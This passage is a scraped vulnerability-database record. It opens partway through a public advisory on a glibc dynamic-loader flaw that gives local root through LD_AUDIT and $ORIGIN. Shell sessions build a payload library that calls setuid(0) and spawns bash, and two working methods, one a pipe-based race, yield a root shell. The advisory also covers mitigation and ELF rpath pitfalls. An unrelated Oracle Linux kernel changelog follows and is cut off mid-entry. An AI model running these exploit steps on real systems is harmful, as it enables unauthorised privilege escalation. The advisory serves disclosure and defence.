/proc link should still exist, but now will be marked deleted.\n$ ls -l /proc/$$/fd/3\nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)\n\n# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().\n$ cat > payload.c\nvoid __attribute__((constructor)) init()\n{\n setuid(0);\n system(\"/bin/bash\");\n}\n^D\n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c\n$ ls -l /tmp/exploit\n-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*\n\n# Now force the link in /proc to load $ORIGIN via LD_AUDIT.\n$ LD_AUDIT=\"\\$ORIGIN\" exec /proc/self/fd/3\nsh-4.1# whoami\nroot\nsh-4.1# id\nuid=0(root) gid=500(taviso)\n\n-------------------\nMitigation\n-----------------------\n\nIt is a good idea to prevent users from creating files on filesystems mounted\nwithout nosuid. The following interesting solution for administrators who\ncannot modify their partitioning scheme was suggested to me by Rob Holland\n(@robholland):\n\nYou can use bind mounts to make directories like /tmp, /var/tmp, etc., nosuid,\nfor example:\n\n# mount -o bind /tmp /tmp\n# mount -o remount,bind,nosuid /tmp /tmp\n\nBe aware of race conditions at boot via crond/atd/etc, and users with\nreferences to existing directories (man lsof), but this may be an acceptable\nworkaround until a patch is ready for deployment.\n\n(Of course you need to do this everywhere untrusted users can make links to\nsuid/sgid binaries. find(1) is your friend).\n\nIf someone wants to create an init script that would automate this at boot for\ntheir distribution, I'm sure it would be appreciated by other administrators.\n\n-------------------\nSolution\n-----------------------\n\nMajor distributions should be releasing updated glibc packages shortly.\n\n-------------------\nCredit\n-----------------------\n\nThis bug was discovered by Tavis Ormandy.\n\n-------------------\nGreetz\n-----------------------\n\nGreetz to Hawkes, Julien, LiquidK, Lcamtuf, Neel, Spoonm, Felix, Robert,\nAsirap, Spender, Pipacs, Gynvael, Scarybeasts, Redpig, Kees, Eugene, Bruce D.,\nand all my other elite friends and colleagues.\n\nAdditional greetz to the openwall guys who saw this problem coming years ago.\nThey continue to avoid hundreds of security vulnerabilities each year thanks to\ntheir insight into systems security.\n\nhttp://www.openwall.com/owl/\n\n-------------------\nNotes\n-----------------------\n\nThere are several known techniques to exploit dynamic loader bugs for suid\nbinaries, the fexecve() technique listed in the Consequences section above is a\nmodern technique, making use of relatively recent Linux kernel features (it was\nfirst suggested to me by Adam Langley while discussing CVE-2009-1894, but I\nbelieve Gabriel Campana came up with the same solution independently).\n\nThe classic UNIX technique is a little less elegant, but has the advantage that\nread access is not required for the target binary. It is rather common for\nadministrators to remove read access from suid binaries in order to make\nattackers work a little harder, so I will document it here for reference.\n\nThe basic idea is to create a pipe(), fill it up with junk (pipes have 2^16\nbytes capacity on Linux, see the section on \"Pipe Capacity\" in pipe(7) from the\nLinux Programmers Manual), then dup2() it to stderr. Following the dup2(),\nanything written to stderr will block, so you simply execve() and then make the\nloader print some error message, allowing you to reliably win any race\ncondition.\n\nLD_DEBUG has always been a a good candidate for getting error messages on\nLinux. The behaviour of LD_DEBUG was modified a few years ago in response to\nsome minor complaints about information leaks, but it can still be used with a\nslight modification (I first learned of this technique from a bugtraq posting\nby Jim Paris in 2004, http://seclists.org/bugtraq/2004/Aug/281).\n\nThe exploit flow for this alternative attack is a little more complicated, but\nwe can still use the shell to do it (this session is from an FC13 system,\noutput cleaned up for clarity).\n\n# Almost fill up a pipe with junk, then dup2() it to stderr using redirection.\n$ (head -c 65534 /dev/zero; LD_DEBUG=nonsense LD_AUDIT=\"\\$ORIGIN\" /tmp/exploit/target 2>&1) | (sleep 1h; cat) &\n[1] 26926\n\n# Now ld.so is blocked on write() in the background trying to say \"invalid\n# debug option\", so we are free to manipulate the filesystem.\n$ rm -rf /tmp/exploit/\n\n# Put exploit payload in place.\n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c\n\n# Clear the pipe by killing sleep, letting cat drain the contents. This will\n# unblock the target, allowing it to continue.\n$ pkill -n -t $(tty | sed 's#/dev/##') sleep\n-bash: line 99: 26929 Terminated sleep 1h\n\n# And now we can take control of a root shell :-)\n$ fg\nsh-4.1# id\nuid=0(root) gid=500(taviso)\n\nAnother technique I'm aware of is setting a ridiculous LD_HWCAP_MASK, then\nwhile the loader is trying to map lots of memory, you have a good chance of\nwinning any race. I previously found an integer overflow in this feature and\nsuggested adding LD_HWCAP_MASK to the unsecure vars list, however the glibc\nmaintainers disagreed and just fixed the overflow.\n\nhttp://www.cygwin.com/ml/libc-hacker/2007-07/msg00001.html\n\nI believe this is still a good idea, and LD_HWCAP_MASK is where I would bet the\nnext big loader bug is going to be, it's just not safe to let attackers have\nthat much control over the execution environment of privileged programs.\n\nFinally, some notes on ELF security for newcomers. The following common\nconditions are usually exploitable:\n\n - An empty DT_RPATH, i.e. -Wl,-rpath,\"\"\n This is a surprisingly common build error, due to variable expansion\n failing during the build process.\n - A relative, rather than absolute DT_RPATH.\n For example, -Wl,-rpath,\"lib/foo\".\n\nI'll leave it as an exercise for the interested reader to explain why. Remember\nto also follow DT_NEEDED dependencies, as dependencies can also declare rpaths\nfor their dependencies, and so on.\n\n-------------------\nReferences\n-----------------------\n\n- http://man.cx/ld.so%288%29, The dynamic linker/loader, Linux Programmer's Manual.\n- http://man.cx/rtld-audit, The auditing API for the dynamic linker, Linux Programmer's Manual.\n- http://man.cx/pipe%287%29, Overview of pipes and FIFOs (Pipe Capacity), Linux Programmer's Manual.\n- Linkers and Loaders, John R. Levine, ISBN 1-55860-496-0.\n- Partitioning schemes and security, http://my.opera.com/taviso/blog/show.dml/654574\n- CVE-2009-1894 description, http://blog.cr0.org/2009/07/old-school-local-root-vulnerability-in.html\n\nYou should subscribe to Linux Weekly News and help support their high standard\nof security journalism.\n\nhttp://lwn.net/\n\nI have a twitter account where I occasionally comment on security topics.\n\nhttp://twitter.com/taviso\n\nex$$", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/linux/local/15274.txt", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:49", "description": "[2.6.18-164.el5]\n- [misc] information leak in sigaltstack (Vitaly Mayatskikh ) [515396]\n- [misc] execve: must clear current->clear_child_tid (Oleg Nesterov ) [515429]\n- [net] igb: set lan id prior to configuring phy (Stefan Assmann ) [508870]\n- [net] udp: socket NULL ptr dereference (Vitaly Mayatskikh ) [518043] {CVE-2009-2698}\n[2.6.18-163.el5]\n- [net] make sock_sendpage use kernel_sendpage (Danny Feng ) [516955] {CVE-2009-2692}\n[2.6.18-162.el5]\n- [x86_64] Intel IOMMU: Pass Through Support (Don Dutile ) [504363]\n[2.6.18-161.el5]\n- [dlm] free socket in error exit path (David Teigland ) [508829]\n- [net] tg3: fix concurrent migration of VM clients (John Feeney ) [511918]\n- [scsi] mptfusion: revert to pci_map (Tomas Henzl ) [514049]\n- [scsi] bnx2i: fix conn disconnection bugs (mchristi@redhat.com ) [513802]\n- [scsi] qla2xxx: unable to destroy npiv HBA ports (Marcus Barrow ) [514352]\n- [scsi] ALUA: send STPG if explicit and implicit (mchristi@redhat.com ) [482737]\n- [scsi] megaraid: fix the tape drive issue (Tomas Henzl ) [510665]\n- [scsi] cxgb3i: fix skb allocation (mchristi@redhat.com ) [514073]\n- [fs] __bio_clone: dont calculate hw/phys segment counts (Milan Broz ) [512387]\n- [fs] ecryptfs: check tag 11 packet data buffer size (Eric Sandeen ) [512863] {CVE-2009-2406}\n- [fs] ecryptfs: check tag 3 packet encrypted key size (Eric Sandeen ) [512887] {CVE-2009-2407}\n- [xen] amd iommu: crash with pass-through on large memory (Bhavna Sarathy ) [514910]\n[2.6.18-160.el5]\n- [scsi] mptsas: fix max_id initialization (mchristi@redhat.com ) [455678]\n- [ata] ahci: add IDs for Ibex Peak ahci controllers (David Milburn ) [513067]\n- [scsi] lpfc: update to 8.2.0.48.2p, fix multiple panics (Rob Evers ) [512266]\n- [gfs2] remove dcache entries for remote deleted inodes (Benjamin Marzinski ) [505548]\n- [alsa] add native support for IbexPeak audio (Jaroslav Kysela ) [509526]\n- [alsa] IbexPeak related patches for codec auto-config (Jaroslav Kysela ) [509526]\n- [scsi] cciss: call bus_unregister in cciss_remove_one (Rob Evers ) [513070]\n- [scsi] cciss: add driver sysfs entries (Rob Evers ) [513070]\n- [net] e1000e/igb: make sure wol can be configured (Andy Gospodarek ) [513032]\n- [fs] xfs: only compile for x86_64 (Eric Sandeen ) [512827]\n- [ahci] add SATA GEN3 related messages (David Milburn ) [512086]\n- [net] tun/tap: open /dev/net/tun and then poll() it fix (Danny Feng ) [512286] {CVE-2009-1897}\n- [net] mlx4_en: problem with LRO that segfaults KVM host (Doug Ledford ) [510789]\n- [openib] mthca: fix over sized kmalloc usage (Doug Ledford ) [508902]\n- [s390] zcrypt: request gets timed out under high load (Hans-Joachim Picht ) [511289]\n[2.6.18-159.el5]\n- [scsi] cciss: fix sysfs broken symlink regression (Rob Evers ) [510178]\n- [kabi] add consume_skb (Jon Masters ) [479200]\n- [net] ipv6: fix incorrect disable_ipv6 behavior (jolsa@redhat.com ) [512258]\n- [net] ipv6: fix BUG when disabled module is unloaded (jolsa@redhat.com ) [512258]\n- [net] ipv6: add 'disable' module parameter support (jolsa@redhat.com ) [512258]\n- Revert: [mm] fix swap race in fork-gup patch group (Larry Woodman ) [508919]\n- [scsi] mptfusion: fix OOPS in failover path (Rob Evers ) [504835]\n- [scsi] stex: minimize DMA coherent allocation (David Milburn ) [486466]\n- [misc] personality handling: fix PER_CLEAR_ON_SETID (Vitaly Mayatskikh ) [508842]\n- [misc] build with -fno-delete-null-pointer-checks (Eugene Teo ) [511181]\n- [scsi] qla2xxx: provide reset capability for EEH (Marcus Barrow ) [511141]\n- [scsi] bnx2i: fix host setup and libiscsi abort locking (mchristi@redhat.com ) [511096]\n- [xen] ia64: fix rmmod of PCI devices (Chris Lalancette ) [507520]\n- [pci] kvm: PCI FLR support for device assignment (Don Dutile ) [510805]\n- [gfs2] dont put unlikely reclaim glocks on reclaim list (Benjamin Marzinski ) [504335]\n[2.6.18-158.el5]\n- [s390] add missing kernel option CONFIG_SHARED_KERNEL (Hans-Joachim Picht ) [506947]\n- [gfs2] fix incorrent statfs_slow consistency check (Benjamin Marzinski ) [505171]\n- [net] be2net: fix msix performance regression (Andy Gospodarek ) [510008]\n- [gfs2] umount.gfs2 hangs eating CPU (Abhijith Das ) [508876]\n- [block] protect the per-gendisk partition array with rcu (Jeff Moyer ) [495866]\n- [net] igb: fix panic when assigning device to guest (Andy Gospodarek ) [507173]\n- [ia64] xen: dom0 get/set_address_size (Chris Lalancette ) [510069]\n- [x86] fix suspend/resume issue on SB800 chipset (Bhavna Sarathy ) [498135]\n- [scsi] cciss: fix spinlock (Tomas Henzl ) [509818]\n- [scsi] qla2xxx: NPIV broken for PPC, endian fix (Marcus Barrow ) [510268]\n- [scsi] qla2xxx: prevent hangs in extended error handling (Marcus Barrow ) [470510]\n- [mm] prevent softlockups in copy_hugetlb_page_range (Larry Woodman ) [508919]\n- [scsi] cxgb3i: fix vlan support (mchristi@redhat.com ) [508409]\n- [net] bnx2i: RHEL-5.4 code cleanups (mchristi@redhat.com ) [504181]\n- [x86_64] import asm/svm.h and asm/vmx.h (Eduardo Habkost ) [507483]\n- [x86_64] import asm/virtext.h (Eduardo Habkost ) [507483]\n- [x86_64] add MSR_VM_* defines (Eduardo Habkost ) [507483]\n- [x86_64] disable VMX and SVM on machine_crash_shutdown (Eduardo Habkost ) [507483]\n- [x86_64] add EFER_SVME define (Eduardo Habkost ) [507483]\n- [x86_64] define X86_CR4_VMXE (Eduardo Habkost ) [507483]\n- [net] qlge: rhel-5.4 cleanups (Marcus Barrow ) [509647]\n- [scsi] lpfc: fix ctx_idx increase and update version (Rob Evers ) [509010]\n- [scsi] lpfc: move pointer ref. inside alloc check in (Rob Evers ) [509010]\n- [scsi] lpfc: update to version 8.2.0.48 (Rob Evers ) [509010]\n- [mm] fix re-read performance regression (Josef Bacik ) [506511]\n- [net] ipsec: add missing braces to fix policy querying (Herbert Xu ) [462731]\n- [net] tg3: 5785F and 50160M support (Andy Gospodarek ) [506205]\n- [pci] intel-iommu: fix iommu address space allocation (Chris Wright ) [509207]\n- [xen] virtio: do not statically allocate root device (Mark McLoughlin ) [501468]\n- [xen] virtio: add PCI device release function (Mark McLoughlin ) [501468]\n- [misc] driver core: add root_device_register (Mark McLoughlin ) [501468]\n- [block] blktrace: fix recursive block remap tracepoint (Jason Baron ) [502573]\n- [scsi] qla2xxx: rhel-5.4 fixes and cleanups (Marcus Barrow ) [507246]\n- [xen] HV: remove high latency spin_lock (Chris Lalancette ) [459410]\n- [xen] ia64: add get/set_address_size support (Chris Lalancette ) [510069]\n[2.6.18-157.el5]\n- [mm] readv: sometimes returns less than it should (Amerigo Wang ) [500693]\n- [net] be2net: fix races in napi and interrupt handling (Andy Gospodarek ) [508839]\n- [net] be2net: fix deadlock with bonding (Andy Gospodarek ) [508871]\n- [xen] quiet printk on FV guest shutdown (Don Dutile ) [501474]\n- [fs] fuse: enable building the subsystem (Josef Bacik ) [457975]\n- [gfs2] fix panic in glock memory shrinker (Benjamin Marzinski ) [508806]\n- [net] rt2x00: use mac80211-provided workqueue (John W. Linville ) [506845]\n- [pci] quirk: disable MSI on VIA VT3364 chipsets (Dean Nelson ) [501374]\n- [net] undo vlan promiscuity count when unregistered (Neil Horman ) [481283]\n- [net] be2net: crash on PPC with LRO and jumbo frames (Andy Gospodarek ) [508404]\n- [net] RTNL: assertion failed due to bonding notify (Stanislaw Gruszka ) [508297]\n- [scsi] ibmvfc: process async events before cmd responses (AMEET M. PARANJAPE ) [508127]\n- [scsi] ibmvfc: fix endless PRLI loop in discovery (AMEET M. PARANJAPE ) [508127]\n- [scsi] ibmvfc: improve LOGO/PRLO ELS handling (AMEET M. PARANJAPE ) [508127]\n- [net] iucv: provide second per-cpu cmd parameter block (Hans-Joachim Picht ) [503240]\n- [net] sky2: /proc/net/dev statistics are broken (Flavio Leitner ) [507932]\n- [scsi] qla2xxx: prevent I/O stoppage (Marcus Barrow ) [507620]\n- [scsi] qla2xxx: updates 24xx firmware to 4.04.09 (Marcus Barrow ) [507398]\n- [scsi] qla2xxx: updates 25xx firmware to 4.04.09 (Marcus Barrow ) [507398]\n- [scsi] qla4xxx: extended sense data errors, cleanups (Marcus Barrow ) [506981]\n- [char] tty: prevent an O_NDELAY writer from blocking (Mauro Carvalho Chehab ) [506806]\n- [xen] allow msi reconfigure for pt_bind_irq (ddugger@redhat.com ) [507970]\n[2.6.18-156.el5]\n- [misc] kdump: make mcp55 chips work (Neil Horman ) [462519]\n- [ide] enable VX800 to use UDMA mode (John Feeney ) [504121]\n- [misc] wacom: reset state when tool is not in proximity (Aristeu Rozanski ) [499870]\n- [scsi] lpfc: update to version 8.2.0.46 (Rob Evers ) [506792]\n- [mm] prevent panic in copy_hugetlb_page_range (Larry Woodman ) [507860]\n- [gfs2] keep statfs info in sync on grows (Benjamin Marzinski ) [494885]\n- [gfs2] always queue work after after setting GLF_LOCK (Benjamin Marzinski ) [506140]\n- [scsi] cxgb3i: use kref to track ddp, support page sizes (mchristi@redhat.com ) [506151]\n- [security] drop mmap_min_addr to 4096 (Eric Paris ) [507017]\n- [misc] hrtimer: fix a soft lockup (Amerigo Wang ) [418071] {CVE-2007-5966}\n- [net] backport net_rx_action tracepoint (Neil Horman ) [506138]\n- [gfs2] fix truncate buffered/direct I/O issue (Steven Whitehouse ) [504676]\n- [xen] x86: fix IRQ problem on legacy hardware (ddugger@redhat.com ) [505491]\n- [xen] disable 2MB support on PAE kernels (Bhavna Sarathy ) [503737]\n[2.6.18-155.el5]\n- [mm] fix swap race condition in fork-gup-race patch (Andrea Arcangeli ) [506684]\n- [net] e1000e: stop unnecessary polling when using msi-x (Andy Gospodarek ) [506841]\n[2.6.18-154.el5]\n- [kABI] add smp_send_reschedule and get_user_pages_fast (Jon Masters ) [504038]\n- [scsi] lpfc: update to version 8.2.0.45 (Rob Evers ) [505445]\n- [fs] ext4: fix prealloc vs truncate corruption (Eric Sandeen ) [505601]\n- [net] r8169: fix crash when large packets are received (Ivan Vecera ) [504732] {CVE-2009-1389}\n- [pci] fix pcie save restore patch (Don Dutile ) [505541]\n- [scsi] ibmvscsi: add 16 byte CDB support (AMEET M. PARANJAPE ) [502944]\n- [infiniband] iw_cxgb3: add final fixups for 1.4.1 (Doug Ledford ) [504906]\n- [infiniband] mlx4_en: hand remove XRC support (Doug Ledford ) [506097]\n- [infiniband] cxgb3: update firmware from 7.1 to 7.4 (Doug Ledford ) [504955]\n- [infiniband] ofed: backports from ofed 1.4.1 final bits (Doug Ledford ) [506097]\n- [infiniband] RDS: Update to ofed 1.4.1 final bits (Doug Ledford ) [506097]\n- [infiniband] mthca: update to ofed 1.4.1 final bits (Doug Ledford ) [506097]\n- [net] cxgb3: support two new phys and page mapping fix (Doug Ledford ) [504955]\n- [infiniband] ipoib/sdp: update to ofed 1.4.1 final bits (Doug Ledford ) [506097]\n- [infiniband] OFED: back out XRC patch, not ready yet (Doug Ledford ) [506097]\n- [infiniband] mlx4_en: update to ofed 1.4.1 final bits (Doug Ledford ) [506097]\n- [infiniband] iw_nes: update to ofed 1.4.1 final bits (Doug Ledford ) [506097]\n- [infiniband] OFED: fix broken switch statement (Doug Ledford ) [506097]\n- [infiniband] OFED: removes this backport and all callers (Doug Ledford ) [506097]\n- [infiniband] iw_cxgb3: update to ofed 1.4.1 final bits (Doug Ledford ) [506097]\n- [infiniband] mlx4_ib: update to ofed 1.4.1 final bits (Doug Ledford ) [506097]\n- [infiniband] remove duplicate definition (Doug Ledford ) [500368]\n- [net] be2net: add intial support (Andy Gospodarek ) [490074]\n- [net] ixgbe: backport fixups and bugfixes for 82599 (Andy Gospodarek ) [505653]\n- [md] increase pg_init_in_progress only if work is queued (Jesse Larrew ) [489582]\n- [x86_64] AMD IOMMU: fix GLX issue in bare metal (Bhavna Sarathy ) [504010]\n- [scsi] libsas: use the supplied address for SATA devices (David Milburn ) [494658]\n- [x86_64] amd iommu: fix kdump unknown partition table (Bhavna Sarathy ) [504751]\n- [char] TPM: get_event_name stack corruption (Dean Nelson ) [503905]\n- [net] e1000e: update to upstream version 1.0.2-k2 (Andy Gospodarek ) [480241]\n- [crypto] add continuous test to hw rng in FIPS mode (Neil Horman ) [504218]\n- [net] ehea: fix invalid pointer access (AMEET M. PARANJAPE ) [504679]\n- [x86_64] amd iommu: fix spinlock imbalance (Bhavna Sarathy ) [501571]\n- [x86_64] iommu: protect against broken IVRS ACPI table (Bhavna Sarathy ) [501571]\n- [x86_64] amd iommu: fix flag masks (Bhavna Sarathy ) [501571]\n- [x86_64] iommu: fix the handling of device aliases (Bhavna Sarathy ) [501571]\n- [x86_64] amd iommu: fix an off-by-one error (Bhavna Sarathy ) [501571]\n- [xen] x86: give dom0 access to machine e820 map (ddugger@redhat.com ) [503818]\n- [pci] fix sr-iov regression with PCI device class (ddugger@redhat.com ) [503826]\n- [scsi] qla4xxx: extended sense data errors (Marcus Barrow ) [489389]\n- [scsi] qla4xxx: remove some dead code (Marcus Barrow ) [459449]\n- [net] qla2xxx, ql8xxx : support for 10 GigE (Marcus Barrow ) [479288]\n[2.6.18-153.el5]\n- [s390x] zfcpdump: move zfcpdump kernel removal to %post (Don Zickus ) [499629]\n- [x86_64] kvm: fix libvirt based device assignment issue (Bhavna Sarathy ) [504165]\n- [gfs2] get gfs2meta superblock correctly (Benjamin Marzinski ) [504086]\n- [ptrace] fix do_coredump vs ptrace_start() deadlock (Oleg Nesterov ) [504157] {CVE-2009-1388}\n- [scsi] ipr: fix PCI permanent error handler (AMEET M. PARANJAPE ) [503960]\n- [scsi] IPR: adapter taken offline after first EEH error (AMEET M. PARANJAPE ) [504675]\n- [scsi] lpfc: update to version 8.2.0.44 (Rob Evers ) [503248]\n- [net] skb_seq_read: wrong offset/len for page frag data (mchristi@redhat.com ) [501308]\n- [xen] netback: change back to a flipping interface (Chris Lalancette ) [479754]\n- [fs] autofs4: remove hashed check in validate_wait (Ian Kent ) [490078]\n- [ppc64] resolves issues with pcie-save-restore-state (AMEET M. PARANJAPE ) [504198]\n- [net] gso: stop fraglists from escaping (Herbert Xu ) [499347]\n- [tun] use non-linear packets where possible (Herbert Xu ) [503309]\n- [net] skb_copy_datagram_from_iovec (Herbert Xu ) [503309]\n- [net] tun: only wake up writers (Herbert Xu ) [503191]\n- Re-apply: [net] tun: add packet accounting (Don Zickus ) [495863]\n- [sched] fix cond_resched_softirq() offset (Jesse Larrew ) [496935]\n- [ata] sata_sx4: fixup interrupt and exception handling (David Milburn ) [503827]\n- Revert: [net] avoid extra wakeups in wait_for_packet (Don Zickus ) [497897]\n- [net] e1000: fix skb_over_panic (Neil Horman ) [503441] {CVE-2009-1385}\n[2.6.18-152.el5]\n- [x86_64] kvm: export symbols to allow building (john cooper ) [504038]\n- [misc] s390 zfcpdump: check for another image on removal (Hans-Joachim Picht ) [499629]\n- [net] ixgbe: fix MSI-X allocation on 8+ core systems (Andy Gospodarek ) [500857]\n- [s390] dasd: add EMC ioctl to the driver (Christoph Hellwig ) [461288]\n- [net] ixgbe: fix polling saturates CPU (Andy Gospodarek ) [503559]\n- [misc] core dump: wrong thread info in core dump file (Amerigo Wang ) [503553]\n- [crypto] testmgr: check all test vector lengths (Jarod Wilson ) [503091]\n- [net] igb and igbvf: return from napi poll correctly (Andy Gospodarek ) [503215]\n- [crypto] testmgr: dynamically allocate xbuf and axbuf (Jarod Wilson ) [503091]\n- [fs] vfs: skip I_CLEAR state inodes in drop_pagecache_sb (Eric Sandeen ) [500164]\n- Revert: [net] tun: add packet accounting (Herbert Xu ) [495863]\n- [net] netxen: add GRO Support (Herbert Xu ) [499347]\n- [nfs] v4: 'r'/'w' perms for user do not work on client (Peter Staubach ) [502244]\n- [x86] nmi: add Intel cpu 0x6f4 to perfctr1 workaround (Prarit Bhargava ) [500892]\n- [dm] raid45 target: kernel oops in constructor (Heinz Mauelshagen ) [503070]\n- [net] sky2: fix sky2 stats (Neil Horman ) [503080]\n- [acpi] check _PSS frequency to prevent cpufreq crash (Prarit Bhargava ) [500311]\n- [scsi] mvsas: sync w/ appropriate upstream changes (Rob Evers ) [485126]\n- [scsi] mvsas: comment cleanup (Rob Evers ) [485126]\n- [scsi] mvsas: correct bit-map implementation (Rob Evers ) [485126]\n- [scsi] mvsas: initial patch submission (Rob Evers ) [485126]\n- [net] add broadcom cnic driver (mchristi@redhat.com ) [441979]\n- [scsi] add bnx2i iscsi driver (mchristi@redhat.com ) [441979]\n- [scsi] add netlink msg to iscsi IF to support offload (mchristi@redhat.com ) [441979]\n- [misc] add UIO framework from upstream (mchristi@redhat.com ) [441979]\n- [net] add cnic support to bnx2 (mchristi@redhat.com ) [441979]\n- [powerpc] pass the PDN to check_msix_entries (AMEET M. PARANJAPE ) [502906]\n- [fs] proc: avoid info leaks to non-privileged processes (Amerigo Wang ) [499541]\n- [net] ixgbe: add GRO suppport (Herbert Xu ) [499347]\n- [net] igb: add GRO suppport (Herbert Xu ) [499347]\n- [net] cxgb3: add GRO suppport (Herbert Xu ) [499347]\n- [net] vlan: add GRO interfaces (Herbert Xu ) [499347]\n- [net] tcp6: add GRO support (Herbert Xu ) [499347]\n- [net] ipv6: add GRO support (Herbert Xu ) [499347]\n- [net] ethtool: add GGRO and SGRO ops (Herbert Xu ) [499347]\n- [net] tcp: add GRO support (Herbert Xu ) [499347]\n- [net] add skb_gro_receive (Herbert Xu ) [499347]\n- [net] ipv4: add GRO infrastructure (Herbert Xu ) [499347]\n- [net] add Generic Receive Offload infrastructure (Herbert Xu ) [499347]\n- [net] add frag_list support to GSO (Herbert Xu ) [499347]\n- [net] add frag_list support to skb_segment (Herbert Xu ) [499347]\n- [net] skbuff: add skb_release_head_state (Herbert Xu ) [499347]\n- [net] skbuff: merge code copy_skb_header and skb_clone (Herbert Xu ) [499347]\n- [netfilter] nf_conntrack: add __nf_copy to copy members (Herbert Xu ) [499347]\n- [net] skbuff: add skb_cow_head (Herbert Xu ) [499347]\n- [net] netpoll: backport netpoll_rx_on (Herbert Xu ) [499347]\n- [net] gro: Optimise Ethernet header comparison (Herbert Xu ) [499347]\n- [net] backport csum_replace4/csum_replace2 (Herbert Xu ) [499347]\n- [net] backport csum_unfold without sparse annotations (Herbert Xu ) [499347]\n- [net] sky2: fix eeprom reads (Neil Horman ) [501050]\n- [nfs] v4: client handling of MAY_EXEC in nfs_permission (Peter Staubach ) [500302] {CVE-2009-1630}\n- [net] forcedeth: restore power up snippet (Ivan Vecera ) [479740]\n- [md] dm: I/O failures when running dm-over-md with xen (Mikulas Patocka ) [223947]\n- [selinux] warn on nfs mounts with same SB but diff opts (Eric Paris ) [466701]\n[2.6.18-151.el5]\n- [alsa] hda: improve init for ALC262_HP_BPC model (Jaroslav Kysela ) [473949]\n- [ppc] LPAR hang on multipath device with FCS v2 (AMEET M. PARANJAPE ) [498927]\n- [fs] nfsd: fix setting the nfsv4 acls (Steve Dickson ) [403021]\n- [scsi] fnic: compile on x86 too (mchristi@redhat.com ) [501112]\n- [net] avoid extra wakeups in wait_for_packet (Neil Horman ) [497897]\n- [x86] xen: fix local denial of service (Chris Lalancette ) [500951]\n- [scsi] ibmvfc: wait on adapter init before starting scan (AMEET M. PARANJAPE ) [501560]\n- [net] bnx2x: update to 1.48.105 (Stanislaw Gruszka ) [475481]\n- [xen] add Credit Scheduler Fairness and hard virt (Justin M. Forbes ) [432700]\n- [xen] deadlock between libvirt and xentop (Miroslav Rezanina ) [499013]\n- [xen] sched: remove printk introduced with hard virt (Justin M. Forbes ) [501475]\n[2.6.18-150.el5]\n- [kabi] add cmirror symbols to kABI (Jon Masters ) [500745]\n- Revert: [sched] accurate task runtime accounting (Linda Wang ) [297731] {CVE-2007-3719}\n- [alsa] hda: add missing comma in ad1884_slave_vols (Jeff Burke ) [500626]\n- [x86] remove xtime_lock from time_cpufreq_notifier (Prarit Bhargava ) [501178]\n- [fs] cifs: fix pointer and checks in cifs_follow_symlink (Jeff Layton ) [496577] {CVE-2009-1633}\n- [fs] ext4: corruption fixes (Eric Sandeen ) [501082]\n- [lockdep] dont omit lock_set_subclass (Aristeu Rozanski ) [462248]\n- [ppc] cell: make ptcal more reliable (AMEET M. PARANJAPE ) [501356]\n- [x86] include asm-x86_64 in i686-devel package (Don Zickus ) [491775]\n- [misc] compile: add -fwrapv to gcc CFLAGS (Don Zickus ) [491266]\n- [trace] mm: eliminate extra mm tracepoint overhead (Larry Woodman ) [501013]\n- [dlm] use more NOFS allocation (Abhijith Das ) [460218]\n- [dlm] connect to nodes earlier (Abhijith Das ) [460218]\n- [wireless] mac80211: freeze when ath5k IF brought down (Michal Schmidt ) [499999]\n- [audit] watch: fix removal of AUDIT_DIR rule on rmdir (Alexander Viro ) [501321]\n- [trace] sunrpc: adding trace points to status routines v2 (Steve Dickson ) [499008]\n- [misc] random: make get_random_int more random (Amerigo Wang ) [499776]\n- [md] retry immediate in 2 seconds (Jesse Larrew ) [489582]\n- [scsi] retry for NOT_READY condition (Jesse Larrew ) [489582]\n- [md] handle multiple paths in pg_init (Jesse Larrew ) [489582]\n- [scsi] fix compilation error (Jesse Larrew ) [489582]\n- [scsi] add LSI storage IDs (Jesse Larrew ) [489582]\n- [scsi] handle quiescence in progress (Jesse Larrew ) [489582]\n- [scsi] retry IO on unit attention (Jesse Larrew ) [489582]\n- [scsi] handle unit attention in mode select (Jesse Larrew ) [489582]\n- [scsi] make the path state active by default (Jesse Larrew ) [471426]\n- [scsi] Retry mode select in rdac device handler (Jesse Larrew ) [489582]\n[2.6.18-149.el5]\n- [acpi] updated dock driver for RHEL-5.4 (Matthew Garrett ) [485181]\n- [infiniband] ib_core: use weak ordering for user memory (AMEET M. PARANJAPE ) [501004]\n- [mm] fork-o_direct-race v3 (aarcange@redhat.com ) [471613]\n- [nfs] make nfsv4recoverydir proc file readable (Evan McNabb ) [499840]\n- [pci] remove pci-stub driver from -xen kernels (Don Dutile ) [500568]\n- [pci] IOMMU phys_addr cleanup (Don Dutile ) [500901]\n- [pci] missed fix to pci_find_upstream_pcie_bridge (Don Dutile ) [500901]\n- [misc] IOMMU MSI header cleanup (Don Dutile ) [500901]\n- [scsi] megaraid: update megasas to 4.08-RH1 (Tomas Henzl ) [475574]\n- [fs] nfs: fix an f_mode/f_flags confusion in write.c (Jeff Layton ) [490181]\n- [fs] cifs: renaming dont try to unlink negative dentry (Jeff Layton ) [500839]\n- [fs] cifs: fix error handling in parse_DFS_referrals (Jeff Layton ) [496577] {CVE-2009-1633}\n- [scsi] aacraid: update to 1.1.5-2461 (Rob Evers ) [475559]\n- [md] dm raid45: dont clear the suspend flag on recovery (Heinz Mauelshagen ) [499406]\n- [net] cxgb3: update driver for RHEL-5.4 (mchristi@redhat.com ) [439518]\n- [scsi] add cxgb3i iscsi driver (mchristi@redhat.com ) [439518]\n- [scsi] port upstream offload code to RHEL-5.4 (mchristi@redhat.com ) [439518]\n- [scsi] force retry of IO when port/session is changing (mchristi@redhat.com ) [498281]\n- [net] igbvf: new driver, support 82576 virtual functions (Andy Gospodarek ) [480524]\n- [net] ehea: fix circular locking problem (AMEET M. PARANJAPE ) [493359]\n- [s390] appldata: vtimer bug with cpu hotplug (Hans-Joachim Picht ) [497207]\n[2.6.18-148.el5]\n- Revert: [mm] fork vs fast gup race fix (Andrea Arcangeli ) [471613]\n[2.6.18-147.el5]\n- Revert: [scsi] marvell sas: initial patch submission (Rob Evers ) [485126]\n- Revert: [scsi] marvell sas: correct bit-map implementation (Rob Evers ) [485126]\n- Revert: [scsi] marvell 